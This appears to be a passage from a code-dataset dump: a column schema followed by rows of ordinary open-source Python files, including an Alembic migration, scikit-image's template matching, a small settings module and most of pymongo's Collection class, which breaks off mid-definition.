hexsha
stringlengths
40
40
size
int64
3
1.03M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
972
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
972
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
972
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
3
1.03M
avg_line_length
float64
1.13
941k
max_line_length
int64
2
941k
alphanum_fraction
float64
0
1
ef5ab39f15ba19cf26d154d97b1439d120a1ea77
1,027
py
Python
migrations/versions/2289e585ec7b_.py
apoorvkhare07/SUMSarizer
ff8264906c380b4d5e6a52a23040bb8bff361c92
[ "MIT" ]
9
2015-03-08T07:45:30.000Z
2019-02-10T04:22:34.000Z
migrations/versions/2289e585ec7b_.py
apoorvkhare07/SUMSarizer
ff8264906c380b4d5e6a52a23040bb8bff361c92
[ "MIT" ]
45
2015-04-09T00:32:09.000Z
2018-08-22T18:04:53.000Z
migrations/versions/2289e585ec7b_.py
apoorvkhare07/SUMSarizer
ff8264906c380b4d5e6a52a23040bb8bff361c92
[ "MIT" ]
13
2015-04-08T23:52:05.000Z
2019-02-20T10:22:33.000Z
"""empty message Revision ID: 2289e585ec7b Revises: 4291771faa57 Create Date: 2016-02-29 01:54:50.285413 """ # revision identifiers, used by Alembic. revision = '2289e585ec7b' down_revision = '4291771faa57' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### op.create_table('sz_job', sa.Column('id', sa.Integer(), nullable=False), sa.Column('study_id', sa.Integer(), nullable=True), sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('state', sa.String(length=64), nullable=True), sa.ForeignKeyConstraint(['study_id'], ['studies.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_sz_job_study_id'), 'sz_job', ['study_id'], unique=False) ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_sz_job_study_id'), table_name='sz_job') op.drop_table('sz_job') ### end Alembic commands ###
28.527778
85
0.682571
f4594662999339f01695fc3e95b0497e5787ca09
292
py
Python
python/katana/local/_graph_numba.py
bobdc/katana
44b85645ef3955dc10653f64779bfec4231f215c
[ "BSD-3-Clause" ]
1
2022-03-17T11:55:26.000Z
2022-03-17T11:55:26.000Z
python/katana/local/_graph_numba.py
bobdc/katana
44b85645ef3955dc10653f64779bfec4231f215c
[ "BSD-3-Clause" ]
null
null
null
python/katana/local/_graph_numba.py
bobdc/katana
44b85645ef3955dc10653f64779bfec4231f215c
[ "BSD-3-Clause" ]
null
null
null
from numba.extending import overload, overload_method from katana.local_native import Graph __all__ = [] @overload_method(Graph._numba_type_wrapper.Type, "node_ids") def overload_Graph_nodes(self): _ = self def impl(self): return range(self.num_nodes()) return impl
18.25
60
0.736301
ad1635c37d775cccf4d3148e12524b788dbeb79e
6,553
py
Python
skimage/feature/template.py
zhanwenchen/scikit-image
af8a78e5b12ebb5709a57f9350b4b1f4c8f0c7db
[ "BSD-3-Clause" ]
3
2019-02-28T16:05:36.000Z
2020-04-03T17:29:07.000Z
Lib/site-packages/skimage/feature/template.py
caiyongji/Anaconda-py36.5-tensorflow-built-env
f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2
[ "PSF-2.0" ]
26
2020-03-24T18:07:06.000Z
2022-03-12T00:12:27.000Z
Lib/site-packages/skimage/feature/template.py
caiyongji/Anaconda-py36.5-tensorflow-built-env
f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2
[ "PSF-2.0" ]
3
2019-12-31T23:21:40.000Z
2020-04-03T17:29:08.000Z
import numpy as np from scipy.signal import fftconvolve from .._shared.utils import assert_nD def _window_sum_2d(image, window_shape): window_sum = np.cumsum(image, axis=0) window_sum = (window_sum[window_shape[0]:-1] - window_sum[:-window_shape[0] - 1]) window_sum = np.cumsum(window_sum, axis=1) window_sum = (window_sum[:, window_shape[1]:-1] - window_sum[:, :-window_shape[1] - 1]) return window_sum def _window_sum_3d(image, window_shape): window_sum = _window_sum_2d(image, window_shape) window_sum = np.cumsum(window_sum, axis=2) window_sum = (window_sum[:, :, window_shape[2]:-1] - window_sum[:, :, :-window_shape[2] - 1]) return window_sum def match_template(image, template, pad_input=False, mode='constant', constant_values=0): """Match a template to a 2-D or 3-D image using normalized correlation. The output is an array with values between -1.0 and 1.0. The value at a given position corresponds to the correlation coefficient between the image and the template. For `pad_input=True` matches correspond to the center and otherwise to the top-left corner of the template. To find the best match you must search for peaks in the response (output) image. Parameters ---------- image : (M, N[, D]) array 2-D or 3-D input image. template : (m, n[, d]) array Template to locate. It must be `(m <= M, n <= N[, d <= D])`. pad_input : bool If True, pad `image` so that output is the same size as the image, and output values correspond to the template center. Otherwise, the output is an array with shape `(M - m + 1, N - n + 1)` for an `(M, N)` image and an `(m, n)` template, and matches correspond to origin (top-left corner) of the template. mode : see `numpy.pad`, optional Padding mode. constant_values : see `numpy.pad`, optional Constant values used in conjunction with ``mode='constant'``. Returns ------- output : array Response image with correlation coefficients. Notes ----- Details on the cross-correlation are presented in [1]_. This implementation uses FFT convolutions of the image and the template. Reference [2]_ presents similar derivations but the approximation presented in this reference is not used in our implementation. References ---------- .. [1] J. P. Lewis, "Fast Normalized Cross-Correlation", Industrial Light and Magic. .. [2] Briechle and Hanebeck, "Template Matching using Fast Normalized Cross Correlation", Proceedings of the SPIE (2001). :DOI:`10.1117/12.421129` Examples -------- >>> template = np.zeros((3, 3)) >>> template[1, 1] = 1 >>> template array([[ 0., 0., 0.], [ 0., 1., 0.], [ 0., 0., 0.]]) >>> image = np.zeros((6, 6)) >>> image[1, 1] = 1 >>> image[4, 4] = -1 >>> image array([[ 0., 0., 0., 0., 0., 0.], [ 0., 1., 0., 0., 0., 0.], [ 0., 0., 0., 0., 0., 0.], [ 0., 0., 0., 0., 0., 0.], [ 0., 0., 0., 0., -1., 0.], [ 0., 0., 0., 0., 0., 0.]]) >>> result = match_template(image, template) >>> np.round(result, 3) array([[ 1. , -0.125, 0. , 0. ], [-0.125, -0.125, 0. , 0. ], [ 0. , 0. , 0.125, 0.125], [ 0. , 0. , 0.125, -1. ]]) >>> result = match_template(image, template, pad_input=True) >>> np.round(result, 3) array([[-0.125, -0.125, -0.125, 0. , 0. , 0. ], [-0.125, 1. , -0.125, 0. , 0. , 0. ], [-0.125, -0.125, -0.125, 0. , 0. , 0. ], [ 0. , 0. , 0. , 0.125, 0.125, 0.125], [ 0. , 0. , 0. , 0.125, -1. , 0.125], [ 0. , 0. , 0. , 0.125, 0.125, 0.125]]) """ assert_nD(image, (2, 3)) if image.ndim < template.ndim: raise ValueError("Dimensionality of template must be less than or " "equal to the dimensionality of image.") if np.any(np.less(image.shape, template.shape)): raise ValueError("Image must be larger than template.") image_shape = image.shape image = np.array(image, dtype=np.float64, copy=False) pad_width = tuple((width, width) for width in template.shape) if mode == 'constant': image = np.pad(image, pad_width=pad_width, mode=mode, constant_values=constant_values) else: image = np.pad(image, pad_width=pad_width, mode=mode) # Use special case for 2-D images for much better performance in # computation of integral images if image.ndim == 2: image_window_sum = _window_sum_2d(image, template.shape) image_window_sum2 = _window_sum_2d(image ** 2, template.shape) elif image.ndim == 3: image_window_sum = _window_sum_3d(image, template.shape) image_window_sum2 = _window_sum_3d(image ** 2, template.shape) template_mean = template.mean() template_volume = np.prod(template.shape) template_ssd = np.sum((template - template_mean) ** 2) if image.ndim == 2: xcorr = fftconvolve(image, template[::-1, ::-1], mode="valid")[1:-1, 1:-1] elif image.ndim == 3: xcorr = fftconvolve(image, template[::-1, ::-1, ::-1], mode="valid")[1:-1, 1:-1, 1:-1] numerator = xcorr - image_window_sum * template_mean denominator = image_window_sum2 np.multiply(image_window_sum, image_window_sum, out=image_window_sum) np.divide(image_window_sum, template_volume, out=image_window_sum) denominator -= image_window_sum denominator *= template_ssd np.maximum(denominator, 0, out=denominator) # sqrt of negative number not allowed np.sqrt(denominator, out=denominator) response = np.zeros_like(xcorr, dtype=np.float64) # avoid zero-division mask = denominator > np.finfo(np.float64).eps response[mask] = numerator[mask] / denominator[mask] slices = [] for i in range(template.ndim): if pad_input: d0 = (template.shape[i] - 1) // 2 d1 = d0 + image_shape[i] else: d0 = template.shape[i] - 1 d1 = d0 + image_shape[i] - template.shape[i] + 1 slices.append(slice(d0, d1)) return response[tuple(slices)]
36.405556
86
0.572104
836c1fc83c17b339ee262c5a02603390e4873e85
479
py
Python
malcolm/modules/pmac/parts/pmacrunnablechildpart.py
MattTaylorDLS/pymalcolm
995a8e4729bd745f8f617969111cc5a34ce1ac14
[ "Apache-2.0" ]
null
null
null
malcolm/modules/pmac/parts/pmacrunnablechildpart.py
MattTaylorDLS/pymalcolm
995a8e4729bd745f8f617969111cc5a34ce1ac14
[ "Apache-2.0" ]
null
null
null
malcolm/modules/pmac/parts/pmacrunnablechildpart.py
MattTaylorDLS/pymalcolm
995a8e4729bd745f8f617969111cc5a34ce1ac14
[ "Apache-2.0" ]
null
null
null
from malcolm.modules.scanning.controllers import RunnableController from malcolm.modules.scanning.parts import RunnableChildPart class PmacRunnableChildPart(RunnableChildPart): # TODO: not sure if this is still needed to reset triggers on pause? # Think it probably is because we need to reset triggers before rearming # detectors @RunnableController.Pause def pause(self, context): child = context.block_view(self.params.mri) child.pause()
36.846154
76
0.762004
ed895d59a38557f542237ab3b2b97220cba1300d
158
py
Python
ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py
keithyang77/ofstest
aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17
[ "MIT" ]
null
null
null
ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py
keithyang77/ofstest
aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17
[ "MIT" ]
null
null
null
ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py
keithyang77/ofstest
aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17
[ "MIT" ]
null
null
null
# Copyright (c) 2021, mds and Contributors # See license.txt # import frappe import unittest class TestCreditandSalesTransactions(unittest.TestCase): pass
17.555556
56
0.797468
c826274fe8993fbbf60897a372c7ee592cc592cd
350
py
Python
app/settings.py
mgajewskik/website_scraper_api
7dab20863ac8461f24cff79f36e39d3ad2b40ed0
[ "MIT" ]
null
null
null
app/settings.py
mgajewskik/website_scraper_api
7dab20863ac8461f24cff79f36e39d3ad2b40ed0
[ "MIT" ]
null
null
null
app/settings.py
mgajewskik/website_scraper_api
7dab20863ac8461f24cff79f36e39d3ad2b40ed0
[ "MIT" ]
null
null
null
import os DATA_PATH = os.getenv("DATA_PATH") PG = { "host": os.getenv("POSTGRES_NAME"), "db": os.getenv("PG_DATABASE"), "user": os.getenv("PG_USER"), "password": os.getenv("PG_PASSWORD"), "port": os.getenv("PG_PORT"), } POSTGRES_URL = ( f"postgresql://{PG['user']}:{PG['password']}@{PG['host']}:{PG['port']}/{PG['db']}" )
20.588235
86
0.577143
2d233472d179414bd09210b47455df56671dc57e
75
py
Python
machine_learning/similarity/problem/__init__.py
caserwin/daily-learning-python
01fea4c5d4e86cbea2dbef8817146f018b5f1479
[ "Apache-2.0" ]
1
2019-05-04T07:27:18.000Z
2019-05-04T07:27:18.000Z
machine_learning/similarity/problem/__init__.py
caserwin/daily-learning-python
01fea4c5d4e86cbea2dbef8817146f018b5f1479
[ "Apache-2.0" ]
null
null
null
machine_learning/similarity/problem/__init__.py
caserwin/daily-learning-python
01fea4c5d4e86cbea2dbef8817146f018b5f1479
[ "Apache-2.0" ]
1
2018-09-20T01:49:36.000Z
2018-09-20T01:49:36.000Z
# -*- coding: utf-8 -*- # @Time : 2019/1/24 上午10:09 # @Author : yidxue
18.75
30
0.52
24cb410aa9bd5f21bee0b5d9edad3aaa4c783db5
100,801
py
Python
ADMIN/venv/lib/python2.7/site-packages/pymongo/collection.py
PayPal-Opportunity-Hack-Chennai-2016/surabi-trust
7f0d2038d5152c8cccb8d9db90b3edc589c3e3d1
[ "Apache-2.0" ]
1
2016-10-09T01:36:54.000Z
2016-10-09T01:36:54.000Z
django_project/env/lib/python2.7/site-packages/pymongo/collection.py
bocaaust/FreshLife
8a4efd9397e5e316f97abacaa765f3d4f9a7b371
[ "Apache-2.0" ]
7
2016-11-12T11:20:25.000Z
2022-03-11T23:11:53.000Z
django_project/env/lib/python2.7/site-packages/pymongo/collection.py
bocaaust/FreshLife
8a4efd9397e5e316f97abacaa765f3d4f9a7b371
[ "Apache-2.0" ]
3
2016-11-12T09:21:38.000Z
2016-11-14T14:00:31.000Z
# Copyright 2009-2015 MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Collection level utilities for Mongo.""" import collections import datetime import warnings from bson.code import Code from bson.objectid import ObjectId from bson.py3compat import (_unicode, integer_types, string_type) from bson.raw_bson import RawBSONDocument from bson.codec_options import CodecOptions from bson.son import SON from pymongo import (common, helpers, message) from pymongo.bulk import BulkOperationBuilder, _Bulk from pymongo.command_cursor import CommandCursor from pymongo.cursor import Cursor from pymongo.errors import ConfigurationError, InvalidName, OperationFailure from pymongo.helpers import _check_write_command_response from pymongo.operations import _WriteOp, IndexModel from pymongo.read_concern import DEFAULT_READ_CONCERN from pymongo.read_preferences import ReadPreference from pymongo.results import (BulkWriteResult, DeleteResult, InsertOneResult, InsertManyResult, UpdateResult) from pymongo.write_concern import WriteConcern try: from collections import OrderedDict _ORDERED_TYPES = (SON, OrderedDict) except ImportError: _ORDERED_TYPES = (SON,) _NO_OBJ_ERROR = "No matching object found" _UJOIN = u"%s.%s" class ReturnDocument(object): """An enum used with :meth:`~pymongo.collection.Collection.find_one_and_replace` and :meth:`~pymongo.collection.Collection.find_one_and_update`. """ BEFORE = False """Return the original document before it was updated/replaced, or ``None`` if no document matches the query. """ AFTER = True """Return the updated/replaced or inserted document.""" class Collection(common.BaseObject): """A Mongo collection. """ def __init__(self, database, name, create=False, codec_options=None, read_preference=None, write_concern=None, read_concern=None, **kwargs): """Get / create a Mongo collection. Raises :class:`TypeError` if `name` is not an instance of :class:`basestring` (:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName` if `name` is not a valid collection name. Any additional keyword arguments will be used as options passed to the create command. See :meth:`~pymongo.database.Database.create_collection` for valid options. If `create` is ``True`` or additional keyword arguments are present a create command will be sent. Otherwise, a create command will not be sent and the collection will be created implicitly on first use. :Parameters: - `database`: the database to get a collection from - `name`: the name of the collection to get - `create` (optional): if ``True``, force collection creation even without options being set - `codec_options` (optional): An instance of :class:`~bson.codec_options.CodecOptions`. If ``None`` (the default) database.codec_options is used. - `read_preference` (optional): The read preference to use. If ``None`` (the default) database.read_preference is used. - `write_concern` (optional): An instance of :class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the default) database.write_concern is used. - `read_concern` (optional): An instance of :class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the default) database.read_concern is used. - `**kwargs` (optional): additional keyword arguments will be passed as options for the create collection command .. versionchanged:: 3.2 Added the read_concern option. .. versionchanged:: 3.0 Added the codec_options, read_preference, and write_concern options. Removed the uuid_subtype attribute. :class:`~pymongo.collection.Collection` no longer returns an instance of :class:`~pymongo.collection.Collection` for attribute names with leading underscores. You must use dict-style lookups instead:: collection['__my_collection__'] Not: collection.__my_collection__ .. versionchanged:: 2.2 Removed deprecated argument: options .. versionadded:: 2.1 uuid_subtype attribute .. mongodoc:: collections """ super(Collection, self).__init__( codec_options or database.codec_options, read_preference or database.read_preference, write_concern or database.write_concern, read_concern or database.read_concern) if not isinstance(name, string_type): raise TypeError("name must be an instance " "of %s" % (string_type.__name__,)) if not name or ".." in name: raise InvalidName("collection names cannot be empty") if "$" in name and not (name.startswith("oplog.$main") or name.startswith("$cmd")): raise InvalidName("collection names must not " "contain '$': %r" % name) if name[0] == "." or name[-1] == ".": raise InvalidName("collection names must not start " "or end with '.': %r" % name) if "\x00" in name: raise InvalidName("collection names must not contain the " "null character") self.__database = database self.__name = _unicode(name) self.__full_name = _UJOIN % (self.__database.name, self.__name) if create or kwargs: self.__create(kwargs) self.__write_response_codec_options = self.codec_options._replace( unicode_decode_error_handler='replace', document_class=dict) def _socket_for_reads(self): return self.__database.client._socket_for_reads(self.read_preference) def _socket_for_primary_reads(self): return self.__database.client._socket_for_reads(ReadPreference.PRIMARY) def _socket_for_writes(self): return self.__database.client._socket_for_writes() def _command(self, sock_info, command, slave_ok=False, read_preference=None, codec_options=None, check=True, allowable_errors=None, read_concern=DEFAULT_READ_CONCERN): """Internal command helper. :Parameters: - `sock_info` - A SocketInfo instance. - `command` - The command itself, as a SON instance. - `slave_ok`: whether to set the SlaveOkay wire protocol bit. - `codec_options` (optional) - An instance of :class:`~bson.codec_options.CodecOptions`. - `check`: raise OperationFailure if there are errors - `allowable_errors`: errors to ignore if `check` is True - `read_concern` (optional) - An instance of :class:`~pymongo.read_concern.ReadConcern`. :Returns: # todo: don't return address (result document, address of server the command was run on) """ return sock_info.command(self.__database.name, command, slave_ok, read_preference or self.read_preference, codec_options or self.codec_options, check, allowable_errors, read_concern=read_concern) def __create(self, options): """Sends a create command with the given options. """ cmd = SON([("create", self.__name)]) if options: if "size" in options: options["size"] = float(options["size"]) cmd.update(options) with self._socket_for_writes() as sock_info: self._command( sock_info, cmd, read_preference=ReadPreference.PRIMARY) def __getattr__(self, name): """Get a sub-collection of this collection by name. Raises InvalidName if an invalid collection name is used. :Parameters: - `name`: the name of the collection to get """ if name.startswith('_'): full_name = _UJOIN % (self.__name, name) raise AttributeError( "Collection has no attribute %r. To access the %s" " collection, use database['%s']." % ( name, full_name, full_name)) return self.__getitem__(name) def __getitem__(self, name): return Collection(self.__database, _UJOIN % (self.__name, name)) def __repr__(self): return "Collection(%r, %r)" % (self.__database, self.__name) def __eq__(self, other): if isinstance(other, Collection): return (self.__database == other.database and self.__name == other.name) return NotImplemented def __ne__(self, other): return not self == other @property def full_name(self): """The full name of this :class:`Collection`. The full name is of the form `database_name.collection_name`. """ return self.__full_name @property def name(self): """The name of this :class:`Collection`.""" return self.__name @property def database(self): """The :class:`~pymongo.database.Database` that this :class:`Collection` is a part of. """ return self.__database def with_options( self, codec_options=None, read_preference=None, write_concern=None, read_concern=None): """Get a clone of this collection changing the specified settings. >>> coll1.read_preference Primary() >>> from pymongo import ReadPreference >>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY) >>> coll1.read_preference Primary() >>> coll2.read_preference Secondary(tag_sets=None) :Parameters: - `codec_options` (optional): An instance of :class:`~bson.codec_options.CodecOptions`. If ``None`` (the default) the :attr:`codec_options` of this :class:`Collection` is used. - `read_preference` (optional): The read preference to use. If ``None`` (the default) the :attr:`read_preference` of this :class:`Collection` is used. See :mod:`~pymongo.read_preferences` for options. - `write_concern` (optional): An instance of :class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the default) the :attr:`write_concern` of this :class:`Collection` is used. - `read_concern` (optional): An instance of :class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the default) the :attr:`read_concern` of this :class:`Collection` is used. """ return Collection(self.__database, self.__name, False, codec_options or self.codec_options, read_preference or self.read_preference, write_concern or self.write_concern, read_concern or self.read_concern) def initialize_unordered_bulk_op(self, bypass_document_validation=False): """Initialize an unordered batch of write operations. Operations will be performed on the server in arbitrary order, possibly in parallel. All operations will be attempted. :Parameters: - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance. See :ref:`unordered_bulk` for examples. .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 2.7 """ return BulkOperationBuilder(self, False, bypass_document_validation) def initialize_ordered_bulk_op(self, bypass_document_validation=False): """Initialize an ordered batch of write operations. Operations will be performed on the server serially, in the order provided. If an error occurs all remaining operations are aborted. :Parameters: - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance. See :ref:`ordered_bulk` for examples. .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 2.7 """ return BulkOperationBuilder(self, True, bypass_document_validation) def bulk_write(self, requests, ordered=True, bypass_document_validation=False): """Send a batch of write operations to the server. Requests are passed as a list of write operation instances ( :class:`~pymongo.operations.InsertOne`, :class:`~pymongo.operations.UpdateOne`, :class:`~pymongo.operations.UpdateMany`, :class:`~pymongo.operations.ReplaceOne`, :class:`~pymongo.operations.DeleteOne`, or :class:`~pymongo.operations.DeleteMany`). >>> for doc in db.test.find({}): ... print(doc) ... {u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')} {u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')} >>> # DeleteMany, UpdateOne, and UpdateMany are also available. ... >>> from pymongo import InsertOne, DeleteOne, ReplaceOne >>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}), ... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)] >>> result = db.test.bulk_write(requests) >>> result.inserted_count 1 >>> result.deleted_count 1 >>> result.modified_count 0 >>> result.upserted_ids {2: ObjectId('54f62ee28891e756a6e1abd5')} >>> for doc in db.test.find({}): ... print(doc) ... {u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')} {u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')} {u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')} :Parameters: - `requests`: A list of write operations (see examples above). - `ordered` (optional): If ``True`` (the default) requests will be performed on the server serially, in the order provided. If an error occurs all remaining operations are aborted. If ``False`` requests will be performed on the server in arbitrary order, possibly in parallel, and all operations will be attempted. - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. :Returns: An instance of :class:`~pymongo.results.BulkWriteResult`. .. seealso:: :ref:`writes-and-ids` .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 3.0 """ if not isinstance(requests, list): raise TypeError("requests must be a list") blk = _Bulk(self, ordered, bypass_document_validation) for request in requests: if not isinstance(request, _WriteOp): raise TypeError("%r is not a valid request" % (request,)) request._add_to_bulk(blk) bulk_api_result = blk.execute(self.write_concern.document) if bulk_api_result is not None: return BulkWriteResult(bulk_api_result, True) return BulkWriteResult({}, False) def _legacy_write(self, sock_info, name, cmd, acknowledged, op_id, bypass_doc_val, func, *args): """Internal legacy write helper.""" # Cannot have both unacknowledged write and bypass document validation. if (bypass_doc_val and not acknowledged and sock_info.max_wire_version >= 4): raise OperationFailure("Cannot set bypass_document_validation with" " unacknowledged write concern") listeners = self.database.client._event_listeners publish = listeners.enabled_for_commands if publish: start = datetime.datetime.now() rqst_id, msg, max_size = func(*args) if publish: duration = datetime.datetime.now() - start listeners.publish_command_start( cmd, self.__database.name, rqst_id, sock_info.address, op_id) start = datetime.datetime.now() try: result = sock_info.legacy_write( rqst_id, msg, max_size, acknowledged) except Exception as exc: if publish: dur = (datetime.datetime.now() - start) + duration if isinstance(exc, OperationFailure): details = exc.details # Succeed if GLE was successful and this is a write error. if details.get("ok") and "n" in details: reply = message._convert_write_result( name, cmd, details) listeners.publish_command_success( dur, reply, name, rqst_id, sock_info.address, op_id) raise else: details = message._convert_exception(exc) listeners.publish_command_failure( dur, details, name, rqst_id, sock_info.address, op_id) raise if publish: if result is not None: reply = message._convert_write_result(name, cmd, result) else: # Comply with APM spec. reply = {'ok': 1} duration = (datetime.datetime.now() - start) + duration listeners.publish_command_success( duration, reply, name, rqst_id, sock_info.address, op_id) return result def _insert_one( self, sock_info, doc, ordered, check_keys, manipulate, write_concern, op_id, bypass_doc_val): """Internal helper for inserting a single document.""" if manipulate: doc = self.__database._apply_incoming_manipulators(doc, self) if not isinstance(doc, RawBSONDocument) and '_id' not in doc: doc['_id'] = ObjectId() doc = self.__database._apply_incoming_copying_manipulators(doc, self) concern = (write_concern or self.write_concern).document acknowledged = concern.get("w") != 0 command = SON([('insert', self.name), ('ordered', ordered), ('documents', [doc])]) if concern: command['writeConcern'] = concern if sock_info.max_wire_version > 1 and acknowledged: if bypass_doc_val and sock_info.max_wire_version >= 4: command['bypassDocumentValidation'] = True # Insert command. result = sock_info.command( self.__database.name, command, codec_options=self.__write_response_codec_options, check_keys=check_keys) _check_write_command_response([(0, result)]) else: # Legacy OP_INSERT. self._legacy_write( sock_info, 'insert', command, acknowledged, op_id, bypass_doc_val, message.insert, self.__full_name, [doc], check_keys, acknowledged, concern, False, self.__write_response_codec_options) if not isinstance(doc, RawBSONDocument): return doc.get('_id') def _insert(self, sock_info, docs, ordered=True, check_keys=True, manipulate=False, write_concern=None, op_id=None, bypass_doc_val=False): """Internal insert helper.""" if isinstance(docs, collections.Mapping): return self._insert_one( sock_info, docs, ordered, check_keys, manipulate, write_concern, op_id, bypass_doc_val) ids = [] if manipulate: def gen(): """Generator that applies SON manipulators to each document and adds _id if necessary. """ _db = self.__database for doc in docs: # Apply user-configured SON manipulators. This order of # operations is required for backwards compatibility, # see PYTHON-709. doc = _db._apply_incoming_manipulators(doc, self) if not (isinstance(doc, RawBSONDocument) or '_id' in doc): doc['_id'] = ObjectId() doc = _db._apply_incoming_copying_manipulators(doc, self) ids.append(doc['_id']) yield doc else: def gen(): """Generator that only tracks existing _ids.""" for doc in docs: # Don't inflate RawBSONDocument by touching fields. if not isinstance(doc, RawBSONDocument): ids.append(doc.get('_id')) yield doc concern = (write_concern or self.write_concern).document acknowledged = concern.get("w") != 0 command = SON([('insert', self.name), ('ordered', ordered)]) if concern: command['writeConcern'] = concern if op_id is None: op_id = message._randint() if bypass_doc_val and sock_info.max_wire_version >= 4: command['bypassDocumentValidation'] = True bwc = message._BulkWriteContext( self.database.name, command, sock_info, op_id, self.database.client._event_listeners) if sock_info.max_wire_version > 1 and acknowledged: # Batched insert command. results = message._do_batched_write_command( self.database.name + ".$cmd", message._INSERT, command, gen(), check_keys, self.__write_response_codec_options, bwc) _check_write_command_response(results) else: # Legacy batched OP_INSERT. message._do_batched_insert(self.__full_name, gen(), check_keys, acknowledged, concern, not ordered, self.__write_response_codec_options, bwc) return ids def insert_one(self, document, bypass_document_validation=False): """Insert a single document. >>> db.test.count({'x': 1}) 0 >>> result = db.test.insert_one({'x': 1}) >>> result.inserted_id ObjectId('54f112defba522406c9cc208') >>> db.test.find_one({'x': 1}) {u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')} :Parameters: - `document`: The document to insert. Must be a mutable mapping type. If the document does not have an _id field one will be added automatically. - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. :Returns: - An instance of :class:`~pymongo.results.InsertOneResult`. .. seealso:: :ref:`writes-and-ids` .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 3.0 """ common.validate_is_document_type("document", document) if not (isinstance(document, RawBSONDocument) or "_id" in document): document["_id"] = ObjectId() with self._socket_for_writes() as sock_info: return InsertOneResult( self._insert(sock_info, document, bypass_doc_val=bypass_document_validation), self.write_concern.acknowledged) def insert_many(self, documents, ordered=True, bypass_document_validation=False): """Insert an iterable of documents. >>> db.test.count() 0 >>> result = db.test.insert_many([{'x': i} for i in range(2)]) >>> result.inserted_ids [ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')] >>> db.test.count() 2 :Parameters: - `documents`: A iterable of documents to insert. - `ordered` (optional): If ``True`` (the default) documents will be inserted on the server serially, in the order provided. If an error occurs all remaining inserts are aborted. If ``False``, documents will be inserted on the server in arbitrary order, possibly in parallel, and all document inserts will be attempted. - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. :Returns: An instance of :class:`~pymongo.results.InsertManyResult`. .. seealso:: :ref:`writes-and-ids` .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 3.0 """ if not isinstance(documents, collections.Iterable) or not documents: raise TypeError("documents must be a non-empty list") inserted_ids = [] def gen(): """A generator that validates documents and handles _ids.""" for document in documents: common.validate_is_document_type("document", document) if not isinstance(document, RawBSONDocument): if "_id" not in document: document["_id"] = ObjectId() inserted_ids.append(document["_id"]) yield (message._INSERT, document) blk = _Bulk(self, ordered, bypass_document_validation) blk.ops = [doc for doc in gen()] blk.execute(self.write_concern.document) return InsertManyResult(inserted_ids, self.write_concern.acknowledged) def _update(self, sock_info, criteria, document, upsert=False, check_keys=True, multi=False, manipulate=False, write_concern=None, op_id=None, ordered=True, 